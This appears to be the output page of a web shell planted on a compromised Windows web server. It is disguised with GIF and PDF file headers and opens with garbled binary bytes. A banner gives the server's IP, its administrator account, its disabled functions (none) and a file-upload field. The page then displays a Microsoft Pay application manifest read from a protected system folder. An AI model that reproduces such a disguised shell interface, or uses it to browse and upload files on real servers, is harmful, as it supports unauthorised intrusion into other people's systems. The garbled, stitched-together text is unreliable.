GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /ProgramData/Microsoft/Windows/AppRepository/ |
Upload File : |
<?xml version="1.0" encoding="utf-8" standalone="yes"?> <Package IgnorableNamespaces="uap uap3 mp rescap build" xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:mp="http://schemas.microsoft.com/appx/2014/phone/manifest" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" xmlns:uap3="http://schemas.microsoft.com/appx/manifest/uap/windows10/3" xmlns:rescap="http://schemas.microsoft.com/appx/manifest/foundation/windows10/restrictedcapabilities" xmlns:build="http://schemas.microsoft.com/developer/appx/2015/build"> <Identity Name="Microsoft.Wallet" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" Version="2.4.18324.0" ProcessorArchitecture="x64" /> <mp:PhoneIdentity PhoneProductId="12ae577e-f8d1-4197-a207-4d24c309ff8f" PhonePublisherId="95d94207-0c7c-47ed-82db-d75c81153c35" /> <Properties> <DisplayName>Microsoft Pay</DisplayName> <PublisherDisplayName>Microsoft Corporation</PublisherDisplayName> <Logo>images\PayStoreLogo.png</Logo> </Properties> <Dependencies> <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.16299.0" MaxVersionTested="10.0.17134.0" /> <PackageDependency Name="Microsoft.VCLibs.140.00" MinVersion="14.0.22929.0" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" /> <PackageDependency Name="Microsoft.NET.Native.Framework.2.2" MinVersion="2.2.27011.0" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" /> <PackageDependency Name="Microsoft.NET.Native.Runtime.2.2" MinVersion="2.2.27011.0" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" /> </Dependencies> <Resources> <Resource Language="EN-US" /> <Resource uap:Scale="200" /> </Resources> <Applications> <Application Id="App" StartPage="index.html"> <uap:VisualElements AppListEntry="none" DisplayName="Microsoft Pay" Description="Microsoft Pay" BackgroundColor="transparent" Square150x150Logo="images\PaySquare150x150Logo.png" Square44x44Logo="images\PaySquare44x44Logo.png"> <uap:DefaultTile Wide310x150Logo="images\PayWide310x150Logo.png" /> <uap:SplashScreen Image="images\PaySplashScreen.png" /> </uap:VisualElements> <uap:ApplicationContentUriRules> <uap:Rule Match="https://wallet.microsoft.com" Type="include" WindowsRuntimeAccess="all" /> <uap:Rule Match="https://*.wallet.microsoft.com" Type="include" WindowsRuntimeAccess="all" /> <uap:Rule Match="https://*.live.com" Type="include" WindowsRuntimeAccess="none" /> <uap:Rule Match="https://wallet.microsoft-ppe.com" Type="include" WindowsRuntimeAccess="all" /> <uap:Rule Match="https://*.wallet.microsoft-ppe.com" Type="include" WindowsRuntimeAccess="all" /> </uap:ApplicationContentUriRules> <Extensions> <Extension Category="windows.preInstalledConfigTask" EntryPoint="Microsoft.Pay.Background.InstallTask" /> <Extension Category="windows.updateTask" EntryPoint="Microsoft.Pay.Background.UpdateTask" /> <Extension Category="windows.backgroundTasks" EntryPoint="Microsoft.Pay.Background.LocalMaintenanceTask"> <BackgroundTasks> <Task Type="timer" /> </BackgroundTasks> </Extension> <Extension Category="windows.backgroundTasks" EntryPoint="Microsoft.Pay.Background.CanMakePaymentTask"> <BackgroundTasks> <Task Type="systemEvent" /> </BackgroundTasks> </Extension> <uap3:Extension Category="windows.appExtension"> <uap3:AppExtension Name="com.microsoft.payment.ext" Id="paymentRequest" PublicFolder="public\paymentRequest" DisplayName="Payment Extension"> <uap3:Properties> <SupportedPaymentMethods> <PaymentMethod Id="https://pay.microsoft.com/microsoftpay" /> <PaymentMethod Id="https://masterpass.com/pay/msft" /> <PaymentMethod Id="basic-card" /> <PaymentMethod Id="amex" /> <PaymentMethod Id="discover" /> <PaymentMethod Id="jcb" /> <PaymentMethod Id="mastercard" /> <PaymentMethod Id="visa" /> </SupportedPaymentMethods> </uap3:Properties> </uap3:AppExtension> </uap3:Extension> </Extensions> </Application> </Applications> <Capabilities> <Capability Name="internetClient" /> <rescap:Capability Name="walletSystem" /> </Capabilities> <Extensions> <Extension Category="windows.activatableClass.inProcessServer"> <InProcessServer> <Path>Microsoft.Wallet.dll</Path> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.InstallTask" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.CanMakePaymentTask" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.SupportedPaymentMethods" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.RegistrationResult" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.UpdateTask" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.Telemetry.TelemetryEvent" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.Telemetry.TelemetryDataProvider" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.Telemetry.TelemetryChannelProvider" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.BackgroundTaskManager" ThreadingModel="both" /> <ActivatableClass ActivatableClassId="Microsoft.Pay.Background.LocalMaintenanceTask" ThreadingModel="both" /> </InProcessServer> </Extension> </Extensions> <build:Metadata> <build:Item Name="TargetFrameworkMoniker" Value=".NETCore,Version=v5.0" /> <build:Item Name="VisualStudio" Version="15.0" /> <build:Item Name="OperatingSystem" Version="10.0.14393.0 (rs1_release.160715-1616)" /> <build:Item Name="Microsoft.Build.AppxPackage.dll" Version="15.0.28307.104" /> <build:Item Name="ProjectGUID" Value="87384b93-6e02-440b-baa1-ddff4edeb9fb" /> <build:Item Name="ilc.exe" Version="2.2.27015.02 built by: PROJECTNREL" /> <build:Item Name="OptimizingToolset" Value="ilc.exe" /> <build:Item Name="DisableReflectionInvokeThunks" Value="true" /> <build:Item Name="UseDotNetNativeSharedAssemblyFrameworkPackage" Value="True" /> <build:Item Name="DisableStackTraceMetadata" Value="true" /> <build:Item Name="DisableExceptionMessages" Value="true" /> <build:Item Name="ShortcutGenericAnalysis" Value="false" /> <build:Item Name="GeneratePGD" Value="false" /> <build:Item Name="ConsumePGD" Value="false" /> <build:Item Name="SingleThreadNUTC" Value="false" /> <build:Item Name="Use64BitCompiler" Value="false" /> <build:Item Name="OptimizeForSize" Value="true" /> <build:Item Name="AlignMethodsAtMinimalBoundaries" Value="true" /> <build:Item Name="MakePri.exe" Version="10.0.17134.12 (WinBuild.160101.0800)" /> </build:Metadata> </Package>